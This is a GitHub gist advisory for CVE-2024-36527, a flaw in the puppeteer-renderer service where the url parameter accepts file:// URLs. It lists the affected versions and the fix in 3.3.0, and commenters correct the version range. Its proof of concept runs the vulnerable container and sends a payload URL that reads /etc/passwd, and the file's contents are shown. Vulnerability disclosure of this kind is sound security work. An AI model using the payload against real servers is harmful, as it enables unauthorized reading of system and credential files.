Skip to content

Instantly share code, notes, and snippets.

@7a6163

7a6163/CVE-2024-36527.md Secret

Last active June 21, 2024 07:40
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save 7a6163/25fef08f75eed219c8ca21e332d6e911 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save 7a6163/25fef08f75eed219c8ca21e332d6e911 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2024-36527
Raw
CVE-2024-36527.md

Vulnerability in puppeteer-renderer Service

CVE ID: CVE-2024-36527

Description:

puppeteer-renderer is a service that can render web pages using Puppeteer. There is a vulnerability in this service where the url parameter is not validated to restrict it to only http or https protocols. This allows an attacker to use the file protocol to perform a path traversal attack.

Impact:

An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.

Affected Versions:

puppeteer-renderer versions prior to 3.3.0.

Mitigation:

Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.

Proof of Concept:

The following example demonstrates how an attacker can exploit this vulnerability:

  1. Start server using docker:
docker run -d --name renderer -p 8080:3000 ghcr.io/zenato/puppeteer-renderer:v3.2.0
  1. Payload:
http://localhost:8080/html?url=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
pptruser:x:999:999::/home/pptruser:/bin/sh

References:

Reported by:

Zac Wang

@cfi-gb
Copy link

cfi-gb commented Jun 21, 2024 

Affected Versions:

puppeteer-renderer versions prior to 3.2.0.

probably should be:

Affected Versions:

puppeteer-renderer versions prior to 3.3.0.

right so that it matches the:

Users should update to version 3.3.0

?

@7a6163
Copy link
Author

7a6163 commented Jun 21, 2024

@cfi-gb
You’re right, I have corrected it. Thank you!

@cfi-gb
Copy link

cfi-gb commented Jun 21, 2024

Thanks a lot 👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment